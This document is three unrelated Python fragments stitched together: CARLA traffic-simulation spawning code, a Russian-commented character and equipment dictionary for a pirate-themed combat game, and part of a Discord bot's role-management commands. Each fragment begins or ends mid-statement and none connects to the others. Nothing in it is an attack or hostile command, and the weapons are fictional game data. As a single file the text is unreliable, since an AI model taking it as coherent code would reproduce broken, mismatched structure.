self.sumo_network = carla.SumoNetwork.load(str(DATA_PATH/'{}.net.xml'.format(args.dataset)))
self.sumo_network_segments = self.sumo_network.create_segment_map()
self.sumo_network_spawn_segments = self.sumo_network_segments.intersection(carla.OccupancyMap(self.bounds_min, self.bounds_max))
self.sumo_network_spawn_segments.seed_rand(self.rng.getrandbits(32))
self.sumo_network_occupancy = carla.OccupancyMap.load(str(DATA_PATH/'{}.network.wkt'.format(args.dataset)))
self.sidewalk = self.sumo_network_occupancy.create_sidewalk(1.5)
self.sidewalk_segments = self.sidewalk.create_segment_map()
self.sidewalk_spawn_segments = self.sidewalk_segments.intersection(carla.OccupancyMap(self.bounds_min, self.bounds_max))
self.sidewalk_spawn_segments.seed_rand(self.rng.getrandbits(32))
self.sidewalk_occupancy = carla.OccupancyMap.load(str(DATA_PATH/'{}.sidewalk.wkt'.format(args.dataset)))
self.client = carla.Client(args.host, args.port)
self.client.set_timeout(10.0)
self.world = self.client.get_world()
self.crowd_service = Pyro4.Proxy('PYRO:crowdservice.warehouse@localhost:{}'.format(args.pyroport))
self.pedestrian_blueprints = self.world.get_blueprint_library().filter('walker.pedestrian.*')
self.vehicle_blueprints = self.world.get_blueprint_library().filter('vehicle.*')
self.car_blueprints = [x for x in self.vehicle_blueprints if int(x.get_attribute('number_of_wheels')) == 4]
self.car_blueprints = [x for x in self.car_blueprints if x.id not in ['vehicle.bmw.isetta', 'vehicle.tesla.cybertruck']] # This dude moves too slow.
self.bike_blueprints = [x for x in self.vehicle_blueprints if int(x.get_attribute('number_of_wheels')) == 2]
class Statistics(object):
def __init__(self, log_file):
self.start_time = None
self.total_num_cars = 0
self.total_num_bikes = 0
self.total_num_pedestrians = 0
self.stuck_num_cars = 0
self.stuck_num_bikes = 0
self.stuck_num_pedestrians = 0
self.avg_speed_cars = 0
self.avg_speed_bikes = 0
self.avg_speed_pedestrians = 0
self.log_file = log_file
def write(self):
self.log_file.write('{} {} {} {} {} {} {} {} {} {}\n'.format(
time.time() - self.start_time,
self.total_num_cars,
self.total_num_bikes,
self.total_num_pedestrians,
self.stuck_num_cars,
self.stuck_num_bikes,
self.stuck_num_pedestrians,
self.avg_speed_cars,
self.avg_speed_bikes,
self.avg_speed_pedestrians))
self.log_file.flush()
os.fsync(self.log_file)
''' ========== MAIN LOGIC FUNCTIONS ========== '''
def do_spawn(c):
c.crowd_service.acquire_new_cars()
spawn_car = c.crowd_service.spawn_car
c.crowd_service.release_new_cars()
c.crowd_service.acquire_new_bikes()
spawn_bike = c.crowd_service.spawn_bike
c.crowd_service.release_new_bikes()
c.crowd_service.acquire_new_pedestrians()
spawn_pedestrian = c.crowd_service.spawn_pedestrian
c.crowd_service.release_new_pedestrians()
if not spawn_car and not spawn_bike and not spawn_pedestrian:
return
# Find car spawn point.
if spawn_car:
aabb_occupancy = carla.OccupancyMap() if c.forbidden_bounds_occupancy is None else c.forbidden_bounds_occupancy
for actor in c.world.get_actors():
if isinstance(actor, carla.Vehicle) or isinstance(actor, carla.Walker):
aabb = get_aabb(actor)
aabb_occupancy = aabb_occupancy.union(carla.OccupancyMap(
carla.Vector2D(aabb.bounds_min.x - c.args.clearance_car, aabb.bounds_min.y - c.args.clearance_car),
carla.Vector2D(aabb.bounds_max.x + c.args.clearance_car, aabb.bounds_max.y + c.args.clearance_car)))
for _ in range(SPAWN_DESTROY_REPETITIONS):
spawn_segments = c.sumo_network_spawn_segments.difference(aabb_occupancy)
if spawn_segments.is_empty:
continue
spawn_segments.seed_rand(c.rng.getrandbits(32))
path = SumoNetworkAgentPath.rand_path(c.sumo_network, PATH_MIN_POINTS, PATH_INTERVAL, spawn_segments, rng=c.rng)
position = path.get_position(c.sumo_network, 0)
trans = carla.Transform()
trans.location.x = position.x
trans.location.y = position.y
trans.location.z = 0.2
trans.rotation.yaw = path.get_yaw(c.sumo_network, 0)
actor = c.world.try_spawn_actor(c.rng.choice(c.car_blueprints), trans)
if actor:
actor.set_collision_enabled(c.args.collision)
c.world.wait_for_tick(1.0) # For actor to update pos and bounds, and for collision to apply.
c.crowd_service.acquire_new_cars()
c.crowd_service.append_new_cars((
actor.id,
[p for p in path.route_points], # Convert to python list.
get_steer_angle_range(actor)))
c.crowd_service.release_new_cars()
aabb = get_aabb(actor)
aabb_occupancy = aabb_occupancy.union(carla.OccupancyMap(
carla.Vector2D(aabb.bounds_min.x - c.args.clearance_car, aabb.bounds_min.y - c.args.clearance_car),
carla.Vector2D(aabb.bounds_max.x + c.args.clearance_car, aabb.bounds_max.y + c.args.clearance_car)))
# Find bike spawn point.
if spawn_bike:
aabb_occupancy = carla.OccupancyMap() if c.forbidden_bounds_occupancy is None else c.forbidden_bounds_occupancy
for actor in c.world.get_actors():
if isinstance(actor, carla.Vehicle) or isinstance(actor, carla.Walker):
aabb = get_aabb(actor)
aabb_occupancy = aabb_occupancy.union(carla.OccupancyMap(
carla.Vector2D(aabb.bounds_min.x - c.args.clearance_bike, aabb.bounds_min.y - c.args.clearance_bike),
carla.Vector2D(aabb.bounds_max.x + c.args.clearance_bike, aabb.bounds_max.y + c.args.clearance_bike)))
for _ in range(SPAWN_DESTROY_REPETITIONS):
spawn_segments = c.sumo_network_spawn_segments.difference(aabb_occupancy)
if spawn_segments.is_empty:
continue
spawn_segments.seed_rand(c.rng.getrandbits(32))
path = SumoNetworkAgentPath.rand_path(c.sumo_network, PATH_MIN_POINTS, PATH_INTERVAL, spawn_segments, rng=c.rng)
position = path.get_position(c.sumo_network, 0)
trans = carla.Transform()
trans.location.x = position.x
trans.location.y = position.y
trans.location.z = 0.2
trans.rotation.yaw = path.get_yaw(c.sumo_network, 0)
actor = c.world.try_spawn_actor(c.rng.choice(c.bike_blueprints), trans)
if actor:
actor.set_collision_enabled(c.args.collision)
c.world.wait_for_tick(1.0) # For actor to update pos and bounds, and for collision to apply.
c.crowd_service.acquire_new_bikes()
c.crowd_service.append_new_bikes((
actor.id,
[p for p in path.route_points], # Convert to python list.
get_steer_angle_range(actor)))
c.crowd_service.release_new_bikes()
aabb = get_aabb(actor)
aabb_occupancy = aabb_occupancy.union(carla.OccupancyMap(
carla.Vector2D(aabb.bounds_min.x - c.args.clearance_bike, aabb.bounds_min.y - c.args.clearance_bike),
carla.Vector2D(aabb.bounds_max.x + c.args.clearance_bike, aabb.bounds_max.y + c.args.clearance_bike)))
if spawn_pedestrian:
aabb_occupancy = carla.OccupancyMap() if c.forbidden_bounds_occupancy is None else c.forbidden_bounds_occupancy
for actor in c.world.get_actors():
if isinstance(actor, carla.Vehicle) or isinstance(actor, carla.Walker):
aabb = get_aabb(actor)
aabb_occupancy = aabb_occupancy.union(carla.OccupancyMap(
carla.Vector2D(aabb.bounds_min.x - c.args.clearance_pedestrian, aabb.bounds_min.y - c.args.clearance_pedestrian),
carla.Vector2D(aabb.bounds_max.x + c.args.clearance_pedestrian, aabb.bounds_max.y + c.args.clearance_pedestrian)))
for _ in range(SPAWN_DESTROY_REPETITIONS):
spawn_segments = c.sidewalk_spawn_segments.difference(aabb_occupancy)
if spawn_segments.is_empty:
continue
spawn_segments.seed_rand(c.rng.getrandbits(32))
path = SidewalkAgentPath.rand_path(c.sidewalk, PATH_MIN_POINTS, PATH_INTERVAL, c.args.cross_probability, c.sidewalk_spawn_segments, c.rng)
position = path.get_position(c.sidewalk, 0)
trans = carla.Transform()
trans.location.x = position.x
trans.location.y = position.y
trans.location.z = 0.5
trans.rotation.yaw = path.get_yaw(c.sidewalk, 0)
actor = c.world.try_spawn_actor(c.rng.choice(c.pedestrian_blueprints), trans)
if actor:
actor.set_collision_enabled(c.args.collision)
c.world.wait_for_tick(1.0) # For actor to update pos and bounds, and for collision to apply.
c.crowd_service.acquire_new_pedestrians()
c.crowd_service.append_new_pedestrians((
actor.id,
[p for p in path.route_points], # Convert to python list.
path.route_orientations))
c.crowd_service.release_new_pedestrians()
aabb = get_aabb(actor)
aabb_occupancy = aabb_occupancy.union(carla.OccupancyMap(
carla.Vector2D(aabb.bounds_min.x - c.args.clearance_pedestrian, aabb.bounds_min.y - c.args.clearance_pedestrian),
carla.Vector2D(aabb.bounds_max.x + c.args.clearance_pedestrian, aabb.bounds_max.y + c.args.clearance_pedestrian)))
def do_destroy(c):
c.crowd_service.acquire_destroy_list()
destroy_list = c.crowd_service.destroy_list
c.crowd_service.destroy_list = []
c.crowd_service.release_destroy_list()
commands = [carla.command.DestroyActor(x) for x in destroy_list]
c.client.apply_batch_sync(commands)
c.world.wait_for_tick(1.0)
def pull_new_agents(c, car_agents, bike_agents, pedestrian_agents, statistics):
new_car_agents = []
new_bike_agents = []
| |
Heroism':1,
'Potion of Antidote':1,
'Infusion of Claws':1,
'Infusion of Vitality':1,
'Rune of Shielding':1,
'Rune of Armor':1,
'Hand Grenade':10,
'Smoke Grenade':2,
},
}
#----
# Союзники (армия) (<NAME>):
metadict_chars['Warrior 2 lvl (абордажник-ветеран)'] = {
'base_unit':'Warrior 2 lvl (grenadier line-infantry-veteran)',
'char_class':'Warrior-heavy',
'equipment_weapon':{
'Potion of Heroism':1,
'Potion of Antidote':1,
'Breastplate, 17 century':1,
'Halberd':1,
'Sabre':1,
'Shield':1,
'Pistol, Lorenzony':1,
'Muskete Bullet':30,
'Hand Grenade':5,
'Smoke Grenade':1,
#'Hand Mortar':1,
#'2lb Bomb':3,
},
}
metadict_chars['Warrior 5 lvl (абордажник-лейтенант) (лидер)'] = {
'base_unit':'Warrior 5 lvl (grenadier line-infantry-lieutenant)',
'char_class':'Warrior-officer',
'equipment_weapon':{
'Potion of Heroism':1,
'Potion of Antidote':1,
'Infusion of Vitality':1,
'Rune of Absorbtion':1,
'Rune of Shielding':1,
'Breastplate, 17 century':1,
'Halberd':1,
'Sabre +1':1,
'Shield':1,
'Pistol, Lorenzony':1,
'Muskete Bullet':30,
'Hand Grenade':5,
'Smoke Grenade':1,
#'Hand Mortar':1,
#'2lb Bomb':3,
},
}
metadict_chars['Warrior 4 lvl (абордажник Эвери)'] = {
'base_unit':'Warrior 4 lvl (grenadier line-infantry-sergeant)',
'char_class':'Warrior-heavy',
'behavior':'elite_warrior',
'class_features':{
'Feat_Martial_Adept':True,
'Menacing_Attack':True,
'Precision_Attack':True,
#'Parry':True,
},
'equipment_weapon':{
#'Potion of Rage':1,
'Potion of Heroism':1,
'Potion of Antidote':1,
'Infusion of Vitality':1,
'Rune of Absorbtion':1,
'Breastplate, 17 century':1,
'Halberd':1,
'Sabre':1,
'Shield':1,
'Pistol, Lorenzony':1,
'Muskete Bullet':30,
'Hand Grenade':10,
'Smoke Grenade':1,
#'Hand Mortar':1,
#'2lb Bomb':3,
},
}
metadict_chars['Warrior 5 lvl (лейтенант Эвери)'] = {
'base_unit':'Warrior 5 lvl (grenadier line-infantry-lieutenant)',
'char_class':'Warrior-officer',
'class_features':{
'Feat_Martial_Adept':True,
'Menacing_Attack':True,
'Precision_Attack':True,
#'Parry':True,
'Extra_Attack':True,
},
'equipment_weapon':{
#'Potion of Rage':1,
'Potion of Heroism':1,
'Potion of Antidote':1,
'Infusion of Vitality':1,
'Rune of Absorbtion':1,
'Breastplate, 17 century':1,
'Halberd':1,
'Sabre +1':1,
'Shield':1,
'Pistol, Lorenzony':1,
'Muskete Bullet':30,
'Hand Grenade':10,
'Smoke Grenade':1,
#'Hand Mortar':1,
#'2lb Bomb':3,
},
}
metadict_chars['Warrior 4 lvl (абордажник Эвери) (лидер)'] = {
'base_unit':'Warrior 4 lvl (grenadier line-infantry-sergeant)',
'char_class':'Warrior-heavy',
'behavior':'elite_warrior',
'equipment_weapon':{
#'Potion of Rage':1,
'Potion of Heroism':1,
'Potion of Antidote':1,
'Infusion of Vitality':1,
'Rune of Absorbtion':1,
'Breastplate, 17 century':1,
'Halberd':1,
'Sabre':1,
'Shield':1,
'Pistol, Lorenzony':1,
'Muskete Bullet':30,
'Hand Grenade':10,
'Smoke Grenade':1,
#'Hand Mortar':1,
#'2lb Bomb':3,
},
}
metadict_chars['Warrior 5 lvl (лейтенант Эвери) (лидер)'] = {
'base_unit':'Warrior 5 lvl (grenadier line-infantry-lieutenant)',
'char_class':'Warrior-officer',
'equipment_weapon':{
#'Potion of Rage':1,
'Potion of Heroism':1,
'Potion of Antidote':1,
'Infusion of Vitality':1,
'Rune of Absorbtion':1,
'Breastplate, 17 century':1,
'Halberd':1,
'Sabre +1':1,
'Shield':1,
'Pistol, Lorenzony':1,
'Muskete Bullet':30,
'Hand Grenade':10,
'Smoke Grenade':1,
#'Hand Mortar':1,
#'2lb Bomb':3,
},
}
#----
# Союзники (армия) (Генри Эвери):
metadict_chars['Warrior 1 lvl (артиллерист)'] = {
'base_unit':'Warrior 1 lvl (cannoneer artillery)',
'behavior':'warrior',
}
metadict_chars['Warrior 2 lvl (артиллерист-ветеран)'] = {
'base_unit':'Warrior 2 lvl (cannoneer artillery-veteran)',
'behavior':'warrior',
}
metadict_chars['Warrior 2 lvl (артиллерист-ветеран) (6lb Cannon)'] = {
'base_unit':'Warrior 2 lvl (cannoneer artillery-veteran)',
'behavior':'elite_warrior',
'equipment_weapon':{
'Rune of Armor':1,
'6lb Cannon, naval':1,
'6lb Bar':100,
'6lb Ball':100,
},
'mount_combat':True,
'mount_type':'6lb Cannon, chassis',
'equipment_mount':{},
}
metadict_chars['Warrior 2 lvl (артиллерист-ветеран) (2lb Falconet)'] = {
'base_unit':'Warrior 2 lvl (cannoneer artillery-veteran)',
'behavior':'elite_warrior',
'equipment_weapon':{
'Rune of Armor':1,
'2lb Falconet':1,
#'2lb Ball':100,
'2lb Bomb':100,
},
'mount_combat':True,
'mount_type':'2lb Cannon, chassis',
'equipment_mount':{},
}
metadict_chars['Warrior 3 lvl (артиллерист-капрал)'] = {
'base_unit':'Warrior 3 lvl (cannoneer artillery-corporal)',
'behavior':'warrior',
}
metadict_chars['Warrior 3 lvl (артиллерист-капрал) (6lb Cannon)'] = {
'base_unit':'Warrior 3 lvl (cannoneer artillery-corporal)',
'behavior':'elite_warrior',
'equipment_weapon':{
'Rune of Armor':1,
'6lb Cannon, naval':1,
'6lb Bar':100,
'6lb Ball':100,
},
'mount_combat':True,
'mount_type':'6lb Cannon, chassis',
'equipment_mount':{},
}
metadict_chars['Warrior 3 lvl (артиллерист-капрал) (12lb Cannon)'] = {
'base_unit':'Warrior 3 lvl (cannoneer artillery-corporal)',
'behavior':'elite_warrior',
'equipment_weapon':{
'Rune of Armor':1,
'12lb Cannon, naval':1,
'12lb Bar':100,
'12lb Ball':100,
},
'mount_combat':True,
'mount_type':'12lb Cannon, chassis',
'equipment_mount':{},
}
metadict_chars['Warrior 4 lvl (артиллерист-сержант)'] = {
'base_unit':'Warrior 4 lvl (cannoneer artillery-sergeant)',
'behavior':'commander',
}
metadict_chars['Warrior 4 lvl (артиллерист-сержант) (12lb Mortar)'] = {
'base_unit':'Warrior 4 lvl (cannoneer artillery-sergeant)',
'behavior':'elite_warrior',
'equipment_weapon':{
'Rune of Armor':1,
'12lb Mortar':1,
'12lb Bomb':100,
},
'mount_combat':True,
'mount_type':'12lb Mortar, chassis',
'equipment_mount':{},
}
metadict_chars['Warrior 4 lvl (артиллерист-сержант) (2lb Falconet)'] = {
'base_unit':'Warrior 4 lvl (cannoneer artillery-sergeant)',
'behavior':'elite_warrior',
'equipment_weapon':{
'Rune of Armor':1,
'2lb Falconet':1,
'2lb Ball':100,
#'2lb Bomb':100,
},
'mount_combat':True,
'mount_type':'2lb Cannon, chassis',
'equipment_mount':{},
}
metadict_chars['Warrior 5 lvl (артиллерист-лейтенант)'] = {
'base_unit':'Warrior 5 lvl (cannoneer artillery-lieutenant)',
}
#----
# Союзники (свита) (Генри Эвери):
metadict_chars['Fighter 11 lvl (Люсьен де ла Помпаж)'] = {
# Тестовый вариант Эвери -- мастера боевых искусств. Боль-боль-боль, всего 17% шансы против кенсэя.
# Fighter 1 lvl (legionary slayer-rookie) sum:100 STR:19 DEX:18 CON:19 INT:15 WIS:12 CHA:17
# Commanding_Presence даёт +1d10 к проверкам Харизмы (Запугивание, Выступление, Убеждение)
# Tactical_Assessment даёт +1d10 к проверкам Мудрости (Проницательность) и Интеллекта (История, Анализ)
'level':11,
'fearless_AI':True,
'hunter_AI':True,
'sneak_AI':True,
'char_class':'Battlemaster',
'hit_dice':'1d10',
'behavior':'commander',
'hitpoints_medial':True,
'abilityes':{
'strength':19,
'dexterity':18,
'constitution':19,
'intelligence':15,
'wisdom':12,
'charisma':17,
},
'class_features':{
'Feat_Shield_Master':True,
'Feat_Heavy_Armor_Master':True,
'Fighting_Style_Defence':True,
'Second_Wind':True,
'Action_Surge':True,
'Extra_Attack':True,
'Indomitable':True,
'Ability_Score_Improvement':{
'strength':+1,
'constitution':+1,
},
# Мастер боевых искусств:
'Martial_Archetype_Battlemaster':True,
'Combat_Superiority':True,
'Student_of_War':True,
# Манёвры (11 lvl -- 7 приёмов, 5 костей превосходства 1d10):
# TODO:
# - Trip_Attack -- сбивание с ног.
# - Grappling_Strike -- захват атакой.
# - Bait_and_Switch -- обмен позициями и +1d10 к AC себя/союзника на ход.
#'Parry':True,
'Menacing_Attack':True,
'Disarming_Attack':True,
'Precision_Attack':True,
'Commanding_Presence':True,
'Tactical_Assessment':True,
#'Bait_and_Switch':True,
},
'race':'Human-hero',
'weapon_skill':['simple','martial'],
'armor_skill':['light','medium','heavy','shield'],
'equipment_supply':soldier_supply,
'equipment_backpack':soldiers_pack,
'equipment_weapon':{
'Potion of Antidote':1,
'Infusion of Heroism':1,
'Rune of Shielding':2,
'Plate Armor +1':1,
'Heavy Shield +1':1,
'Rarity +2':1,
'Rapier +2':1,
'Pistol, Ashbeard':1,
'Muskete Bullet':30,
#'Hand Grenade':10,
'Smoke Grenade':1,
'Poison Blade':40,
},
}
metadict_chars['Fighter 13 lvl (Генри Эвери)'] = {
# Тестовый вариант Эвери -- мистического рыцаря. С Mirror_Image и Blur побеждает кенсэя в 60% случаев.
# Fighter 1 lvl (legionary sentinel-battler) sum:103 STR:19 DEX:17 CON:18 INT:16 WIS:16 CHA:17
# Использует "Обнаружение мыслей" (Detect_Thoughts), чтобы читать мысли других.
'level':13,
'fearless_AI':True,
'hunter_AI':True,
'no_grappler_AI':True,
'char_class':'Eldritch_Knight',
'hit_dice':'1d10',
'behavior':'commander',
'hitpoints_medial':True,
'abilityes':{
'strength':19,
'dexterity':17,
'constitution':18,
'intelligence':16,
'wisdom':16,
'charisma':17,
},
'class_features':{
# TODO:
# - Eldritch_Strike -- удачный удар = помеха на спасброски от закл. до конца следующего хода.
'Feat_War_Caster':True,
'Feat_Shield_Master':True,
'Feat_Heavy_Armor_Master':True,
'Feat_Inspiring_Leader':True,
'Ability_Score_Improvement':{
'strength':+1,
'intelligence':+2,
},
'Fighting_Style_Blind_Fighting':True,
'Second_Wind':True,
'Action_Surge':True,
# Мистический рыцарь
'Martial_Archetype_Eldritch_Knight':True,
'Weapon_Bond':True,
'Spellcasting':True,
'Spells':[
# 9 заклинаний на 13 lvl (2 заклинания вне школ evocation и abjuration)
('cantrip', 'Message'),
('cantrip', 'Green_Flame_Blade'),
#('cantrip', 'Blade_Ward'),
#('ritual', 'Alarm'),
('1_lvl', 'Shield'),
#('2_lvl', 'Shield'),
#('1_lvl', 'Fog_Cloud'),
('2_lvl', 'Mirror_Image'),
('3_lvl', 'Blur'),
('2_lvl', 'Darkness'),
#('2_lvl', 'Flaming_Sphere'),
#('2_lvl', 'Detect_Thoughts'),
('2_lvl', 'Gust_of_Wind'),
('2_lvl', 'Warding_Wind'),
('3_lvl', 'Counterspell'),
('3_lvl', 'Fireball'),
],
'Extra_Attack':True,
'Indomitable':True,
'War_Magic':True,
'Eldritch_Strike':True,
},
'race':'Human-hero',
'weapon_skill':['simple','martial'],
'armor_skill':['light','medium','heavy','shield'],
'equipment_supply':soldier_supply,
'equipment_backpack':soldiers_pack,
'equipment_weapon':{
# TODO: руны 3 круга
#'Infusion of Regeneration':1,
'Rune of Absorbtion':2,
'Plate Armor +1':1,
'Heavy Shield +1':1,
#'Sword of Flame Tongue':1,
#'Sword of Life-Stealing':1,
#'Longsword +2':1,
'Rarity +2':1,
},
}
#----
# Противник (армия) (Гангсвэй, Gunsway):
metadict_chars['Commoner 1 lvl (паломник с Ганг-и-Савайя)'] = {
'base_unit':'Commoner 1 lvl (militia bowman)',
'behavior':'warrior',
'equipment_weapon':{
'Dagger':1,
'Shortbow':1,
'Arrow':40,
},
}
metadict_chars['Commoner 2 lvl (дворянин с Ганг-и-Савайя)'] = {
'base_unit':'Commoner 2 lvl (militia bowman-veteran)',
'behavior':'warrior',
'weapon_skill':['simple','martial'],
'equipment_weapon':{
'Shield':1,
'Scimitar':1,
'Shortbow':1,
'Arrow':40,
},
}
metadict_chars['Warrior 3 lvl (охранник с Ганг-и-Савайя)'] = {
'base_unit':'Warrior 3 lvl (sqythian bowman-corporal)',
'behavior':'elite_warrior',
'equipment_weapon':{
'Rune of Armor':1,
'Shield':1,
'Scimitar':1,
'Longbow':1,
'Arrow':40,
#'Pistol, Lorenzony':1,
#'Muskete Bullet':30,
},
}
metadict_chars['Warrior 4 lvl (охранник-сержант с Ганг-и-Савайя)'] = {
'base_unit':'Warrior 4 lvl (sqythian bowman-sergeant)',
'equipment_weapon':{
'Rune of Armor':1,
'Rune of Shielding':1,
'Shield':1,
'Scimitar':1,
'Longbow':1,
'Arrow':40,
#'Pistol, Lorenzony':1,
#'Muskete Bullet':30,
},
}
metadict_chars['Warrior 5 lvl (охранник-лейтенант с Ганг-и-Савайя)'] = {
'base_unit':'Warrior 5 lvl (sqythian bowman-lieutenant)',
'equipment_weapon':{
'Rune of Armor':1,
'Rune of Shielding':1,
'Rune of Absorbtion':1,
'Shield':1,
'Scimitar +1':1,
'Longbow':1,
'Arrow':40,
#'Pistol, Lorenzony':1,
#'Muskete Bullet':30,
},
}
#----
# Противник (армия) (Аурелис):
metadict_chars['Ranger 5 lvl (лейтенант Аурелиса) (следопыт)'] = {
# Шайтаны
'volley_AI':True,
'base_unit':'Ranger 5 lvl (otherworld wanderer-lieutenant)',
'race':'Primevial-medium-hero',
'equipment_weapon':{
'Potion of Heroism':1,
'Potion of Antidote':1,
'Infusion of Regeneration':1,
'Rune of Armor':1,
'Rune of Shielding':1,
'Shield':1,
'Longsword +1':1,
'Longbow, Black Skies':1,
'Seeking Arrow':60,
'Sleep Blade':60,
#'Poison Blade':40,
},
}
metadict_chars['Barbarian 5 lvl (лейтенант Аурелиса) (берсерк)'] = {
'volley_AI':True,
'base_unit':'Barbarian 5 lvl (thracian slayer-lord)',
'race':'Primevial-medium-hero',
'equipment_weapon':{
'Potion of Heroism':1,
'Potion of Antidote':1,
'Infusion of Regeneration':1,
#'Rune of Armor':1,
'Rune of Absorbtion':1,
'Rune of Shielding':1,
'Heavy Shield':1,
'Greatsword +1':1,
'Longbow, Black Skies':1,
'Seeking Arrow':60,
'Sleep Blade':60,
},
}
metadict_chars['Warrior 5 lvl (лейтенант Аурелиса)'] = {
'level':5,
'char_class':'Warrior-bowman',
'hit_dice':'1d8',
'behavior':'elite_warrior',
'class_features':{
'Fighting_Style_Archery':True,
'Feat_Sharpshooter':True,
'Extra_Attack':True,
},
'race':'Primevial-medium',
'weapon_skill':['simple','martial'],
'armor_skill':['light','medium','heavy','shield'],
'equipment_supply':soldier_supply,
'equipment_backpack':soldiers_pack,
'equipment_weapon':{
'Potion of Heroism':1,
'Potion of Antidote':1,
'Infusion of Regeneration':1,
'Rune of Armor':1,
'Rune of Shielding':1,
'Shield':1,
'Longsword +1':1,
'Longbow, Black Skies':1,
'Seeking Arrow':60,
'Sleep Blade':60,
#'Poison Blade':40,
},
}
#----
# Противник (армия) (Салиф):
metadict_chars['Warrior 4 lvl (гвардеец Салифа)'] = {
'level':4,
'char_class':'Warrior-pirate',
'hit_dice':'1d8',
'behavior':'elite_warrior',
'class_features':{
'Fighting_Style_Protection':True,
'Feat_Magic_Initiate':True,
'Spellcasting':True,
'Spells':[
('cantrip', 'Mending'),
('cantrip', 'Acid_Splash'),
('ritual', 'Unseen_Servant'),
],
},
'race':'Human-common',
'weapon_skill':['simple','martial'],
'armor_skill':['light','medium','heavy','shield'],
'equipment_supply':soldier_supply,
'equipment_backpack':soldiers_pack,
'equipment_weapon':{
#'Potion of Rage':1,
'Potion of Heroism':1,
'Potion of Antidote':1,
'Rune of Armor':1,
'Rune of Absorbtion':1,
'Heavy Shield':1,
'Sabre':1,
'Longbow':1,
'Poison Arrow':40,
'Poison Blade':10,
#'Flame Grenade':10,
'Smoke Grenade':1,
},
#'mount_combat':False,
#'mount_type':'Riding Horse',
#'equipment_mount':{
# },
}
metadict_chars['Warrior 5 lvl (лейтенант Салифа)'] | |
failed. Bot does not have sufficient permissions to remove {} from {}'.format(
rem_role.mention,
base_role.mention))
except discord.HTTPException:
await self.bot.say('Remove failed, role could not be removed for some reason ¯\_(ツ)_/¯')
@roles.command(pass_context=True)
async def replace(ctx, base_role: discord.Role, rep_role: discord.Role):
if not ctx.message.server:
await self.bot.say('Sorry, but this command is only accessible from a server')
return
in_server = self.bot.get_server(server=ctx.message.server)
if not self.bot.has_high_permissions(ctx.message.author, in_server):
return
try:
for m in ctx.message.server.members:
for r in m.roles:
if r.id == base_role.id:
await self.bot.remove_roles(m, base_role)
await self.bot.add_roles(m, rep_role)
break
await self.bot.say('Replaced role {} for all members with role {}'.format(rep_role.mention,
base_role.mention))
except discord.Forbidden:
await self.bot.say(
'Remove failed. Bot does not have sufficient permissions to replace {} with {}'.format(
base_role.mention,
rep_role.mention))
except discord.HTTPException:
await self.bot.say('Replace failed, role could not be replaced for some reason ¯\_(ツ)_/¯')
@roles.command(pass_context=True)
async def create(ctx, name: str, color: str = '0xffffff'):
if not ctx.message.server:
await self.bot.say('Sorry, but this command is only accessible from a server')
return
in_server = self.bot.get_server(server=ctx.message.server)
if not self.bot.has_high_permissions(ctx.message.author, in_server):
return
try:
color = int(color, 16)
except Exception:
color = 0xffffff
try:
r = await self.bot.create_role(server=ctx.message.server, name=name,
color=discord.Color(color),
mentionable=True)
await self.bot.say('Created role {}!'.format(r.mention))
except discord.Forbidden:
await self.bot.say("I don't have permission to do this.")
except discord.HTTPException:
await self.bot.say("Error in creating role :(")
@roles.command(pass_context=True)
async def edit(ctx, name: str, *, options: str):
if not ctx.message.server:
await self.bot.say('Sorry, but this command is only accessible from a server')
return
in_server = self.bot.get_server(server=ctx.message.server)
if not self.bot.has_high_permissions(ctx.message.author, in_server):
return
role = [x for x in ctx.message.server.roles if x.name == name]
if not role:
await self.bot.say('Role `{}` does not exist'.format(name))
return
options_d = {}
for o in shlex.split(options, comments=False, posix=' '):
if o:
parts = o.split('=')
options_d[parts[0].lower()] = parts[1]
if 'color' in options_d:
options_d['color'] = options_d['color'].replace('#', '0x')
try:
color = int(options_d['color'], 16)
except Exception:
color = 0xffffff
options_d['color'] = discord.Color(color)
try:
r = await self.bot.edit_role(server=ctx.message.server, role=role[0], **options_d)
await self.bot.say('Updated role `{}`'.format(name))
except discord.Forbidden:
await self.bot.say('I do not have permissions for this.')
except Exception:
await self.bot.say('Error in formatting')
@roles.command(pass_context=True)
@self.bot.test_high_perm
async def timeout(server, ctx):
timeout_role = None
try:
timeout_role = [x for x in ctx.message.server.roles if x.name.lower() == 'timeout'][0]
except Exception:
pass
if timeout_role:
await self.bot.say('There is already a `timeout` role present', delete_after=10)
else:
perm = discord.Permissions.general()
perm.speak = False
perm.send_messages = False
perm.send_tts_messages = False
try:
await self.bot.create_role(ctx.message.server, name='timeout', permissions=perm)
await self.bot.say('Created `timeout` successfully!')
except discord.Forbidden:
await self.bot.say('I do not have sufficient permissions to make this role.', delete_after=10)
except discord.HTTPException:
await self.bot.say('An error occurred while creating role :(', delete_after=10)
@roles.command(pass_context=True)
async def help(ctx):
await self.bot.send_message(ctx.message.author,
'**Roles usage:**\n'
'`{0}roles <add/remove> [base role] [new role] [optional:"NoRole"]`\n'
'`{0}roles <replace> [old role] [new role]`\n'
'`{0}roles <create> [name] [color]`\n'
'The roles command automates mass addition, removal and replacement of roles, '
'as well as creation for custom colors.'
'Example:\n'
'`{0}roles add @SomeRole @OtherRole` will add `@OtherRole` to all users with '
'role `@SomeRole`\n'
'If the third argument "NoRole" is passed to `add/remove`, the second role '
'will be added to/removed from only users with no role\n'
'In `add/remove`, "base role" is used only to qualify, it will not be '
'affected.\n'
'*Note: make sure [base role] and [new role] are discord-formatted '
'mentions*'.format(self.bot.command_prefix))
@self.bot.group(pass_context=True, aliases=['sroles', 'self-roles', 'selfrole'])
async def selfroles(ctx):
if not ctx.invoked_subcommand:
if not ctx.subcommand_passed:
await selfroles.get_command('listall').callback(ctx)
else:
arg = command_util.extract_passed(ctx, self.bot)
arg.replace('"', '')
await selfroles.get_command('add').callback(ctx, arg=arg)
@selfroles.command(pass_context=True)
@self.bot.test_high_perm
async def register(server, ctx, *, arg: str):
# final list of role objects to register
to_register = self.extract_roles(ctx, arg)
if not to_register:
await self.bot.say('Bad argument, pass one role or a list of comma-separated roles ❌')
return
for r in to_register: # type: discord.Role
server.selfroles.append(r.id)
storage.write_server_data(server)
if len(to_register) == 1:
await self.bot.say('Registered role **{}** to selfroles 📑'.format(to_register[0].name))
else:
await self.bot.say('Registered roles **{}** to selfroles 📑'
''.format(', '.join([r.name for r in to_register])))
@selfroles.command(pass_context=True)
@self.bot.test_high_perm
async def deregister(server, ctx, *, arg: str):
# final list of role objects to deregister
to_register = self.extract_roles(ctx, arg)
if not to_register:
await self.bot.say('Bad argument, pass one role or a list of comma-separated roles ❌')
return
for r in to_register: # type: discord.Role
server.selfroles.remove(r.id)
storage.write_server_data(server)
if len(to_register) == 1:
